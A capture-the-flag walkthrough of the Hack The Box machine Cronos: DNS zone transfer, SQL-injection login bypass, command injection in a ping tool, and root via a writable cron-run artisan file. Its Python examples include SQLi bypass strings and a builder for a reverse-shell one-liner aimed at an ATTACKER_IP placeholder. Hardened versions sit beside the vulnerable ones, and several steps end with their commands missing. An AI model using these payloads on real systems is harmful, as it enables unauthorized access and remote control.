Cronos

Reconnaissance:

NMAP:

┌──(kali💀kali)-[~]
└─$ sudo nmap -sC -sV -O 10.10.10.13

22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 18:b9:73:82:6f:26:c7:78:8f:1b:39:88:d8:02:ce:e8 (RSA)
|   256 1a:e6:06:a6:05:0b:bb:41:92:b0:28:bf:7f:e5:96:3b (ECDSA)
|_  256 1a:0e:e7:ba:00:cc:02:01:04:cd:a3:a9:3f:5e:22:20 (ED25519)

53/tcp open  domain  ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.10.3-P4-Ubuntu

80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works

Aggressive OS guesses: Linux 3.13 (96%), Linux 3.16 (96%), Linux 3.2 - 4.9 (96%), Linux 4.8 (96%), Linux 4.4 (95%), Linux 4.9 (95%), Linux 3.12 (95%), Linux 3.18 (95%), Linux 3.8 - 3.11 (95%), Linux 4.2 (95%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Enumeration: DNS - TCP/UDP 53

For DNS enumeration, the first thing to do is try to resolve the IPs of Cronos. I’ll use nslookup, setting the server to Cronos, and then looking up Cronos’ IP:

Knowing the domain ns1.cronos.htb is useful, as it not only provides a domain name to poke at, but also confirms the base domain cronos.htb. Any time there’s TCP DNS, it’s worth trying a zone transfer, which returns another two subdomains, admin and www:

I’ll add the following line to my /etc/hosts file:

Since virtual hosts are involved here, I’ll run a quick gobuster subdomain brute force, but it only returns the known three:
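The zone transfer, hosts-file and vhost steps above all reduce to one task: turn the records the server hands back into name-to-IP pairs you can feed to /etc/hosts and gobuster. The following Python is an added example written for this page (not the author's code or output); the AXFR text it parses is a constructed sample in dig's output format, built only from the names and address the page mentions, and is not the box's real zone contents.

```python
import re
from ipaddress import ip_address

# Constructed sample of `dig axfr cronos.htb @10.10.10.13` output, trimmed to
# the lines that matter. It illustrates the format, not the real zone.
SAMPLE_AXFR = """\
; <<>> DiG 9.18.0 <<>> axfr cronos.htb @10.10.10.13
cronos.htb.             604800  IN      SOA     cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
cronos.htb.             604800  IN      NS      ns1.cronos.htb.
cronos.htb.             604800  IN      A       10.10.10.13
admin.cronos.htb.       604800  IN      A       10.10.10.13
ns1.cronos.htb.         604800  IN      A       10.10.10.13
www.cronos.htb.         604800  IN      A       10.10.10.13
cronos.htb.             604800  IN      SOA     cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
;; Query time: 20 msec
"""

# owner  TTL  IN  type  target  (only A and CNAME records are of interest here)
RECORD = re.compile(r"^(?P<name>\S+)\s+\d+\s+IN\s+(?P<type>A|CNAME)\s+(?P<target>\S+)$")


def parse_axfr(text):
    """Return {hostname: target} for every A/CNAME record in dig axfr output."""
    records = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(";"):
            continue  # dig banner and statistics lines
        m = RECORD.match(line)
        if m:
            records[m["name"].rstrip(".")] = m["target"].rstrip(".")
    return records


def resolve_a(records):
    """Follow CNAME chains (loop-safe) so every name maps to an IP literal."""
    out = {}
    for name in records:
        target, seen = records[name], set()
        while target in records and target not in seen:
            seen.add(target)
            target = records[target]
        try:
            ip_address(target)
        except ValueError:
            continue  # dangling CNAME or a loop: nothing to put in /etc/hosts
        out[name] = target
    return out


def hosts_lines(text):
    """Collapse the zone into /etc/hosts lines, one per IP, names sorted."""
    by_ip = {}
    for name, ip in sorted(resolve_a(parse_axfr(text)).items()):
        by_ip.setdefault(ip, []).append(name)
    return [f"{ip} {' '.join(names)}" for ip, names in by_ip.items()]


if __name__ == "__main__":
    for line in hosts_lines(SAMPLE_AXFR):
        print(line)
```

The names in the resulting list are also the wordlist seed for a vhost brute force: anything gobuster finds beyond them is a host the zone did not advertise.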

Enumeration: Website - TCP 80

By visiting the website by IP address, I just get the default Ubuntu Apache 2 page. I ran a gobuster brute force, but didn’t find anything. ns1.cronos.htb returns the same thing.

Gobuster Enumeration:

Virtual Host Enumeration:

www.cronos.htb - TCP 80

Interestingly, all of the links go to external sites for Laravel, a “PHP framework for web artisans” (whatever that means). Again, gobuster here only returns /css, /js, and index.php.

searchsploit does show exploits against the Laravel framework:

On doing some inspection of these scripts (searchsploit -x [Path]), the first one is a way to trick the hash engine because of a truncation issue, but I don’t see any way to apply it here. The second, fourth, and fifth are not for this web framework.

The Metasploit script could have promise, but there are two issues:

  • I don’t know the version of Laravel that’s being run to know if it is vulnerable.

  • The exploit requires that I find a way to leak the APP_KEY. If I can find a way to leak that (perhaps an LFI), I’ll come back to give this a try.

admin.cronos.htb - TCP 80

The site just presents a login form and an advertisement (something I hadn’t seen in HTB before; it seems to be real).

Shell as www-data

SQLi Bypass Login:

The payload allows me to bypass the login, which presents the next page, Net Tool v0.1:

With SQL injection, the attacker is injecting additional characters into the original SQL statement, causing an entirely different SQL query to be executed. In the case
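The login form's real query is not shown on the page, so the following is an added example (not the page's code) of the mechanism just described: a login check that splices user input into SQL text, beside the same check with bound parameters. The users table and the two bypass payloads are constructed for the demo; the page does not say which payload the author used.

```python
import sqlite3


def make_db():
    """In-memory stand-in for the login backend (constructed; the real schema is
    unknown). Passwords are stored in clear only to keep the demo short."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT, password TEXT)")
    con.execute("INSERT INTO users VALUES ('admin', 'S3cret!')")
    return con


def login_vulnerable(con, username, password):
    """User input becomes part of the statement text, so a quote or comment
    marker in the input rewrites the WHERE clause."""
    query = ("SELECT username FROM users WHERE username='" + username +
             "' AND password='" + password + "'")
    row = con.execute(query).fetchone()
    return row[0] if row else None


def login_safe(con, username, password):
    """Same check with bound parameters: the input is always data, never syntax."""
    query = "SELECT username FROM users WHERE username=? AND password=?"
    row = con.execute(query, (username, password)).fetchone()
    return row[0] if row else None


# Two classic bypass inputs (assumed for the example).
COMMENT_OUT = "admin'-- "    # closes the string, then comments out the password clause
ALWAYS_TRUE = "' OR '1'='1"  # clause becomes (username=.. AND password='') OR '1'='1'

if __name__ == "__main__":
    db = make_db()
    print(login_vulnerable(db, COMMENT_OUT, "wrong"))    # admin
    print(login_vulnerable(db, "nobody", ALWAYS_TRUE))   # admin
    print(login_safe(db, COMMENT_OUT, "wrong"))          # None
```

The comment marker (`-- ` here; `#` on MySQL) is what makes the first payload work with an arbitrary password: everything after it, including the AND, is no longer part of the query.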

Command Injection:

The dropdown offers traceroute and ping. I can ping myself, and the results are printed on the screen:

It is so I’m not sure why this didn’t work. Let’s try python.

We get back a low-privileged shell!
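The page does not show the Net Tool source, so the following is an added example (not the box's code) of the pattern behind the injection: a handler that pastes the target field into a shell command line, beside a hardened version that validates the target and runs the program without a shell. To keep the demo runnable offline, `echo` stands in for the real ping binary (an assumption made here); the reverse-shell builder returns the usual Python one-liner with placeholder address and port.

```python
import ipaddress
import re
import subprocess

HOSTNAME = re.compile(r"^[A-Za-z0-9](?:[A-Za-z0-9.-]{0,252}[A-Za-z0-9])?$")


def ping_vulnerable(host):
    """Net Tool style handler: the field is pasted into a shell command, so
    `;`, `|`, `$(...)` and friends in the input are interpreted by /bin/sh.
    `echo` replaces ping so the demo needs no network."""
    cmd = "echo ping -c 1 " + host
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def valid_target(host):
    """Accept an IP literal or a plain hostname; reject anything else."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return bool(HOSTNAME.match(host))


def ping_safe(host):
    """Validate first, then pass the target as one argv element with no shell,
    so shell metacharacters can never be interpreted."""
    if not valid_target(host):
        raise ValueError("invalid target: " + repr(host))
    return subprocess.run(["echo", "ping", "-c", "1", host],
                          capture_output=True, text=True).stdout


def injection_payload(cmd, target="127.0.0.1"):
    """A valid target followed by a separator and the attacker's command,
    the shape of input that was typed into the ping field."""
    return f"{target}; {cmd}"


def python_reverse_shell(ip, port):
    """The classic Python reverse shell one-liner (placeholder ip/port here);
    works on both Python 2 and 3 and is what goes after the separator."""
    return ("python -c 'import socket,subprocess,os;s=socket.socket();"
            f"s.connect((\"{ip}\",{port}));"
            "[os.dup2(s.fileno(),i) for i in (0,1,2)];"
            "subprocess.call([\"/bin/sh\",\"-i\"])'")


if __name__ == "__main__":
    print(ping_vulnerable(injection_payload("id")))        # ping line, then uid=...
    print(ping_safe("10.10.10.13"))                        # ping -c 1 10.10.10.13
    print(injection_payload(python_reverse_shell("ATTACKER_IP", 4444)))
```

The hardened version rejects the payload before any process is spawned, which is the check to look for when reviewing similar "network tool" features: an allow-list on the argument plus argv execution, never string concatenation into a shell.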

Priv: www-data –> root

I’ll go into my local linPEAS directory and start a Python3 webserver. Then I can grab it from Cronos:

Now run it, and in the Cron jobs section, the last line is red:

The cron syntax here says that it will run every minute, as root.

I don’t really need to know what the Laravel artisan is doing. What does matter is that as www-data, I have write permissions on that file.

Poison artisan

Make a copy of the artisan file

Create the reverse shell payload

Cron job will run every minute
